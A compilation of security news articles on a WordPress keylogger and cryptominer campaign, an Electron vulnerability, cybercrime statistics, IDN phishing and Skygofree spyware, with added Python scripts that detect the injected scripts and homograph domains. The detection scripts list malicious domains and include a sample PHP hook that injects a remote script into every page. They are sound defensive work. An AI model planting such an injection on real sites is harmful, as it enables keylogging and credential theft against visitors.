Nearly 2000 WordPress Websites Infected with a Keylogger

More than 2,000 WordPress websites have once again been found infected with a piece of crypto-mining malware that not only steals the resources of visitors' computers to mine digital currencies but also logs visitors' every keystroke.
Security researchers at Sucuri discovered a malicious campaign that infects WordPress websites with a malicious script that delivers an in-browser cryptocurrency miner from CoinHive and a keylogger.

Coinhive is a popular browser-based service that lets website owners embed a JavaScript snippet which uses the CPU power of their visitors' computers to mine the Monero cryptocurrency.

Sucuri researchers said the threat actors behind this new campaign are the same ones who infected more than 5,400 WordPress websites last month, since both campaigns used the keylogger/cryptocurrency malware known as cloudflare[.]solutions.

Spotted in April last year, Cloudflare[.]solutions is cryptocurrency-mining malware and is not related in any way to the network management and cybersecurity firm Cloudflare. It was given this name because the cloudflare[.]solutions domain was initially used to spread it.

The malware was updated in November to include a keylogger. The keylogger behaves the same way as in previous campaigns and captures keystrokes on both the site's administrator login page and the website's public-facing front end.


If the infected WordPress site is an e-commerce platform, hackers can steal much more valuable data, including payment card data. If hackers manage to steal the admin credentials, they can just log into the site without relying upon a flaw to break into the site.

The cloudflare[.]solutions domain was taken down last month, but criminals behind the campaign registered new domains to host their malicious scripts that are eventually loaded onto WordPress sites.
The new web domains registered by hackers include cdjs[.]online (registered on December 8th), cdns[.]ws (on December 9th), and msdns[.]online (on December 16th).

Just like in the previous cloudflare[.]solutions campaign, the cdjs[.]online script is injected into either a WordPress database or the theme's functions.php file. The cdns[.]ws and msdns[.]online scripts are also found injected into the theme's functions.php file.

According to source-code search engine PublicWWW, some 129 websites are infected via the cdns[.]ws domain and 103 via cdjs[.]online, while over a thousand sites were reported to have been infected via the msdns[.]online domain.
Researchers said it's likely that the majority of the websites have not been indexed yet.

"While these new attacks do not yet appear to be as massive as the original Cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection. It’s possible that some of these websites didn't even notice the original infection," Sucuri researchers concluded.

If your website has already been compromised by this infection, you will need to remove the malicious code from the theme's functions.php file and scan the wp_posts table for any possible injection.
Users are also advised to change all WordPress passwords and update all server software, including third-party themes and plugins, to be on the safe side.
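As an added example (not code from Sucuri's write-up or from The Hacker News), the following Python scan performs the two checks just described: it looks through a theme's functions.php source and through rows exported from the wp_posts table for script tags whose host is one of the domains named in the article, or a subdomain of one. The PHP snippet and post rows below are constructed for illustration, and the file names in the sample URLs are placeholders.

```python
import re
from urllib.parse import urlparse

# Domains named in the article, written defanged as on the page;
# refang() removes the brackets before matching.
IOC_DOMAINS = ["cloudflare[.]solutions", "cdjs[.]online", "cdns[.]ws", "msdns[.]online"]

# Matches <script ... src="..."> in HTML, including HTML echoed from a PHP string.
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)


def refang(domain):
    return domain.replace("[.]", ".")


def hostname_of(url):
    """Return the lowercase host of a script URL; handles //host/path and bare host/path."""
    if url.startswith("//"):
        url = "http:" + url
    elif "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def matches_ioc(host):
    """True if host is one of the indicator domains or a subdomain of one."""
    for ioc in (refang(d) for d in IOC_DOMAINS):
        if host == ioc or host.endswith("." + ioc):
            return True
    return False


def scan_text(text, origin):
    """Return one finding per script tag whose host matches an indicator domain."""
    findings = []
    for match in SCRIPT_SRC_RE.finditer(text):
        src = match.group(1)
        host = hostname_of(src)
        if matches_ioc(host):
            findings.append({"where": origin, "src": src, "host": host})
    return findings


def scan_functions_php(php_source):
    return scan_text(php_source, "theme/functions.php")


def scan_wp_posts(rows):
    """rows: iterable of (ID, post_content), e.g. from SELECT ID, post_content FROM wp_posts."""
    findings = []
    for post_id, content in rows:
        findings.extend(scan_text(content, f"wp_posts ID={post_id}"))
    return findings


# Constructed sample data (not real theme code or real posts).
SAMPLE_FUNCTIONS_PHP = """<?php
add_action('wp_enqueue_scripts', 'mytheme_scripts');
// injected hook: prints a remote script into the head of every page
function injected_head() {
    echo '<script type="text/javascript" src="//cdjs.online/PLACEHOLDER.js"></script>';
}
add_action('wp_head', 'injected_head');
"""

SAMPLE_WP_POSTS = [
    (1, "<p>Welcome to the shop.</p>"),
    (2, '<p>Sale!</p><script src="https://msdns.online/PLACEHOLDER.js"></script>'),
    (3, '<script src="https://example.com/assets/app.js"></script>'),  # legitimate
]

if __name__ == "__main__":
    for f in scan_functions_php(SAMPLE_FUNCTIONS_PHP) + scan_wp_posts(SAMPLE_WP_POSTS):
        print(f"{f['where']}: script loaded from {f['host']} ({f['src']})")
```

Matching on the host rather than on the raw string means protocol-relative (`//host/...`) and `https://` references are treated alike, and a subdomain of an indicator domain is still caught. On a live site the wp_posts rows would come from a database export; any finding should be followed by the password and update steps above, since the injected code itself is only the visible symptom.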


Source: The Hacker News


Critical Flaw Hits Popular Windows Apps Built With Electron JS Framework

A critical remote code execution vulnerability has been reported in Electron, a popular web application framework that powers thousands of widely used desktop applications including Skype, Signal, WordPress and Slack.
Electron is an open-source framework based on Node.js and the Chromium engine that allows developers to build cross-platform native desktop applications for Windows, macOS and Linux without knowing the native programming languages of each platform.


The vulnerability, assigned CVE-2018-1000006, affects only those apps that run on Microsoft Windows and register themselves as the default handler for a protocol like myapp://.
"Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron's app.setAsDefaultProtocolClient API," Electron says in an advisory published Monday.
The Electron team has also confirmed that applications built for Apple's macOS and Linux are not vulnerable to this issue, nor are apps (including Windows apps) that do not register themselves as the default handler for a protocol like myapp://.
The Electron developers have already released patched versions of their framework, 1.8.2-beta.4, 1.7.11 and 1.6.16, to address this critical vulnerability.

"If for some reason you are unable to upgrade your Electron version, you can append '--' as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options," the company says.

End users can do nothing about this vulnerability; instead, developers using the Electron framework have to upgrade their applications immediately to protect their user base.

Few details of the remote code execution vulnerability have been disclosed so far, and for security reasons the advisory did not name any of the vulnerable apps (those that make themselves the default protocol handler).
We will update you as soon as any details about the flaw come out.



Source: The Hacker News


The $6bn Crime: 17 Million UK Consumers Hit Last Year

Cybercrime cost 17 million UK consumers an estimated £4.6bn ($6bn) last year, according to Symantec.

The vendor polled over 21,000 adults across 21 markets, including 1000 in the UK, to compile its 2017 Norton Cyber Security Insights Report.

Globally, cyber-criminals stole £130bn ($172bn) from 978 million consumers in those countries.

The UK’s mature online economy contributed a hefty chunk of the £20.7bn taken from 98.2 million European consumers during the period. Even more telling, each victim of cybercrime is said to have lost nearly two working days (14.8 hrs) dealing with the aftermath of the incident.

Just one in 12 UK consumers suffered a ransomware file lock-down, with over a fifth (22%) failing to regain access to their data despite paying the ransom.

The 44% of British internet users who said they never back up their data could be playing a risky game.

“Handing the hackers money simply continues to fund their efforts with no guarantee that you’ll personally be able to regain access to your digital life,” warned Nick Shaw, general manager of Norton EMEA. “In the case of ransomware, crime pays, and we can all take some simple steps to thwart their efforts.”

Tellingly, cybercrime victims were more likely to use the same online password across all their accounts: 20% versus 12% of non-victims.

Cybercrime is becoming more frequent: 60% of those who have suffered an attack in the past were hit in the past year, including 37% who handed over info after being phished, 40% who had their home Wi-Fi cracked, a third who were conned into fraudulent purchases and more than a quarter who fell for tech support scams.

Yet 28% of UK victims think they’re able to protect their data from future attacks and 26% think they’re at low risk of being hit again, according to the report.

“Consumers’ actions revealed a dangerous disconnect: despite a steady stream of cybercrime sprees reported by media, too many people appear to feel invincible and skip taking even basic precautions to protect themselves,” said Shaw. “This disconnect highlights the need for consumer digital safety and the urgency for consumers to get back to basics when it comes to doing their part to prevent cybercrime.”

Source:  Info-Security 


UK’s Top Law Firms at Risk After 1m+ Credentials Found on Dark Web

The UK’s top law firms are at serious risk of unauthorized network intrusions after new research revealed over one million breached credentials on the dark web.

RepKnight studied 620 domains belonging to 500 of the UK’s law firms and found 1.16 million corporate email addresses on various sites which collect previously stolen or leaked credentials.

What’s more, more than half of these had been posted in the past six months, and 80% had an associated password – often available in clear text or hashed values which can be easily cracked, the vendor claimed.

“This puts those staff – and the law firm’s network – at significant risk from ‘credential stuffing’ attacks, where bots are used to repeatedly try the same username and password on multiple sites,” the report continued. “Perhaps more serious are ‘spear phishing’ attacks or identity fraud, where those credentials are used as part of a targeted cyber-attack on that individual.”

The vast majority of these credentials were taken from third-party breaches such as the one at LinkedIn, where law firm employees had signed up with their work credentials.

However, their appearance on dark web sites with associated passwords plunges their employers into a potentially alarming situation, if those credentials are used to access the corporate network, craft spear-phishing emails loaded with malware, or even attempt CEO fraud.

Any leaks of highly sensitive client or employee data could result in heavy fines under the GDPR.

The legal sector is coming under increasing scrutiny from cyber-criminals looking to tap the wealth of lucrative information such firms hold.

A quarter (24%) of SME-sized firms in the sector suffered a cyber-attack last year, with the figure rising to 36% for London-based companies, according to NatWest.

Meanwhile, two major US law firms were hacked in 2016 for information subsequently used in a $4m insider trading scam.

Both the Panama Papers and Paradise Papers leaks also came about after offshore law firms were targeted.

Source:  Info-Security 


High-Profile Twitter Accounts Hit by Turkish Propaganda Campaign

A Twitter campaign purportedly carried out by Turkish hacker group ‘Ayyildiz Tim’ has targeted the accounts of several high-profile individuals to spread political propaganda, according to McAfee.

In a blog post on the firm's website, Christiaan Beek, lead scientist and principal engineer, and Raj Samani, chief scientist and McAfee fellow, explained that, upon investigating the recent events, McAfee Advanced Threat Research discovered that the Twitter account of the Indian ambassador to the United Nations had been taken over on January 13 and used to spread pro-Pakistan and pro-Turkey postings.

“What seemed to be a single event soon became a targeted campaign that we discovered in cooperation with our partner SocialSafeGuard,” the pair wrote, with the accounts of Borge Brende, president of the World Economic Forum, Eric Bolling and Greta Van Susteren, both of Fox News, also targeted.

“Once the accounts were compromised, the attackers direct-messaged the account contacts with propaganda for their cause or with a link to convince them to click on a phishing site that would harvest the Twitter credentials of the victim.”

When looking at the source code of the malicious pages, McAfee found several Turkish-language segments, with ‘Ayyildiz Tim’ claiming responsibility for the attacks.

“There is also evidence that private messaging history has been accessed from certain compromised accounts of prominent figures, along with other sensitive or confidential information such as private phone numbers and emails,” McAfee added.

“These tactics demonstrate the use of authority and social validation as subconscious levers to invoke victim interaction,” Samani told Infosecurity. “Whilst these methods are typical for email, Twitter is a relatively new channel for such activities.

“Twitter users – or anyone using social media – should always be wary of the potential for criminals to take control of their account. This news proves the importance of double checking that the appropriate security controls are in place. Using Twitter’s log in verification is an essential extra layer of security that could well prevent many successful attacks.”

Source: Info-Security


Report Details 100+ Domains at Risk from IDN-Related Spoofing

Researchers have warned of a major phishing threat posed by domain names spoofed using International Domain Name (IDN) homographs.

Attackers can use IDN characters to mimic Latin script, and thus lure unsuspecting users into visiting phishing sites that are “pixel-perfect renditions of the brands they’re impersonating,” according to Farsight Security.

While the security challenges around IDNs are well known, the firm conducted its own research into the area, revealing several real-world examples to underline the scale of the problem.

From October 17, 2017 to January 10, 2018, the firm observed 125 top domains being subverted by over 116,000 homographs.

“We observed IDN homographs mimicking 125 top ‘phish-worthy’ domains including large content providers, social networking giants, financial websites, luxury brands, cryptocurrency exchanges, and other popular websites,” explained the vendor’s Mike Schiffman.

One example is a phishing site using IDN characters to spoof "Facebook."

Other big name brands affected included Apple, Adobe, Amazon, Bank of America, Cisco, Coinbase, Credit Suisse, eBay, Bittrex, Google, Microsoft, Netflix, New York Times, Twitter, Walmart, Yahoo, Wikipedia, YouTube and Yandex.

From an end-user perspective the best form of defense is to be suspicious of any unsolicited email regardless of sender — especially ones featuring enticing statements or account log-in links.

Enabling phishing filters, safe browsing and 2FA for log-ins will also help to combat the risk of phishing and account hijacking.

“If you operate a popular website that allows users to interact with one another, log in, purchase and/or download things, chances are your brand (and therefore your users) will be on some target list for phishers and other internet criminals,” continued Schiffman.

“You will want to pay attention to the IDN space, and either try to register IDN domain names proactively that could be used to impersonate your brand, or subscribe to a service that allows you to monitor recent IDN homograph registration and use in an attempt to impersonate your brand.”
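As an added example, not code from Farsight Security or Infosecurity, here is a Python check in the spirit of the monitoring Schiffman recommends. It decodes a candidate domain from punycode, reports whether its registrable label mixes scripts, and folds a small table of look-alike characters onto Latin to see whether the result collapses onto a protected brand name. The brand list is a subset of the names in the article; the look-alike table is a constructed subset rather than Unicode's full confusables data, and the sample domains are constructed.

```python
import unicodedata

# Brand names taken from the article's list of affected brands (illustrative subset).
BRANDS = {"facebook", "apple", "google", "microsoft", "amazon", "netflix"}

# Constructed subset of look-alike mappings: Cyrillic, Greek and other letters that
# render like Latin ones. A production check would use Unicode's confusables.txt.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0456": "i", "\u0458": "j", "\u04bb": "h",
    "\u04cf": "l", "\u03b1": "a", "\u03bf": "o", "\u0261": "g", "\u0131": "i",
}


def to_unicode(domain):
    """Decode punycode (xn--) labels to Unicode; leave already-Unicode input unchanged."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain


def label_scripts(label):
    """Scripts used by the letters in a label, taken from the first word of each character name."""
    scripts = set()
    for ch in label:
        if ch.isalpha():
            scripts.add(unicodedata.name(ch, "UNKNOWN").split()[0])
    return scripts


def skeleton(label):
    """NFKC-normalise, then replace each look-alike character with its Latin counterpart."""
    normalised = unicodedata.normalize("NFKC", label)
    return "".join(CONFUSABLES.get(ch, ch) for ch in normalised)


def analyze(domain):
    """Flag a registrable label that mixes scripts or collapses onto a protected brand."""
    udomain = to_unicode(domain).lower().rstrip(".")
    labels = udomain.split(".")
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    scripts = label_scripts(sld)
    skel = skeleton(sld)
    findings = []
    if len(scripts) > 1:
        findings.append("mixed-script label (" + ", ".join(sorted(scripts)) + ")")
    if skel != sld and skel in BRANDS:
        findings.append("look-alike of brand '" + skel + "'")
    return {"domain": domain, "unicode": udomain, "label": sld,
            "scripts": sorted(scripts), "skeleton": skel, "findings": findings}


if __name__ == "__main__":
    # Constructed samples: a genuine domain, a mixed-script spoof of facebook,
    # and an all-Cyrillic spoof of apple (which the mixed-script rule alone would miss).
    for sample in ["facebook.com", "f\u0430cebook.com", "\u0430\u0440\u0440\u04cf\u0435.com"]:
        result = analyze(sample.encode("idna").decode("ascii"))
        print(result["domain"], "->", result["unicode"], result["findings"] or "no findings")
```

The two rules are deliberately independent: a label written entirely in one non-Latin script passes the mixed-script test, so the skeleton comparison against the brand list is what catches a whole-word look-alike. Fed from a stream of newly registered IDN domains, this is the kind of filter that would surface registrations worth a closer look.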

Source:  Info-Security 


Skygofree — Powerful Android Spyware Discovered

Security researchers have unveiled one of the most powerful and highly advanced Android spyware tools that give hackers full control of infected devices remotely.
Dubbed Skygofree, the Android spyware has been designed for targeted surveillance, and it is believed to have been targeting a large number of users for the past four years.

Since 2014, the Skygofree implant has gained several novel features previously unseen in the wild, according to a new report published by Russian cybersecurity firm Kaspersky Lab.

The 'remarkable new features' include location-based audio recording using the device's microphone, the use of Android Accessibility Services to steal WhatsApp messages, and the ability to connect infected devices to malicious Wi-Fi networks controlled by the attackers.

Skygofree is being distributed through fake web pages mimicking leading mobile network operators, most of which have been registered by the attackers since 2015—the year when the distribution campaign was most active, according to Kaspersky's telemetry data.

Italian IT Firm Behind Skygofree Spyware?


Researchers at Kaspersky Lab believe the hacker or hacking group behind this mobile surveillance tool has been active since 2014 and is based in Italy, home of the infamous 'Hacking Team', one of the world's bigger players in spyware trading.

"Given the many artifacts we discovered in the malware code, as well as infrastructure analysis, we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions, just like HackingTeam," said the report.

Kaspersky found several Italian devices infected with Skygofree, which the firm described as one of the most powerful, advanced mobile implants it has ever seen.

Although the security firm has not confirmed the name of the Italian company behind this spyware, it found multiple references to the Rome-based technology company "Negg" in the spyware's code. Negg also specialises in developing and selling legal hacking tools.

Skygofree: Powerful Android Spyware Tool

Once installed, Skygofree hides its icon and starts background services to conceal further actions from the user. It also includes a self-protection feature, preventing services from being killed.


As of October last year, Skygofree had become a sophisticated multi-stage spyware tool that gives attackers full remote control of the infected device using a reverse shell payload and a command-and-control (C&C) server architecture.

According to the technical details published by the researchers, Skygofree includes multiple exploits to escalate privileges to root, granting it the ability to execute its most sophisticated payloads on infected Android devices.


One such payload allows the implant to execute shellcode and steal data belonging to other applications installed on the targeted devices, including Facebook, WhatsApp, Line, and Viber.
"There are multiple, exceptional capabilities: usage of multiple exploits for gaining root privileges, a complex payload structure, [and] never-before-seen surveillance features," the researchers said.

Skygofree's command-and-control (C&C) server also allows attackers to capture pictures and videos remotely, seize call records and SMS messages, and monitor the user's geolocation, calendar events and any information stored in the device's memory.

Besides this, Skygofree can also record audio via the microphone when the infected device is in a specified location, and it can force the infected device to connect to compromised Wi-Fi networks controlled by the attacker, enabling man-in-the-middle attacks.

The spyware uses "the Android Accessibility Service to get information directly from the displayed elements on the screen, so it waits for the targeted application to be launched and then parses all nodes to find text messages," Kaspersky said.

Kaspersky researchers also found a variant of Skygofree targeting Windows users, suggesting the authors' next area of interest is the Windows platform.

The best way to prevent yourself from being a victim is to avoid downloading apps via third-party websites, app stores or links provided in SMS messages or emails.

Source:  The Hacker News 


Intel Tiger Lake CPUs to come with Anti-Malware Protection

Intel’s Tiger Lake CPUs will come with Control-flow Enforcement Technology (CET), aimed at battling common control-flow hijacking attacks. I...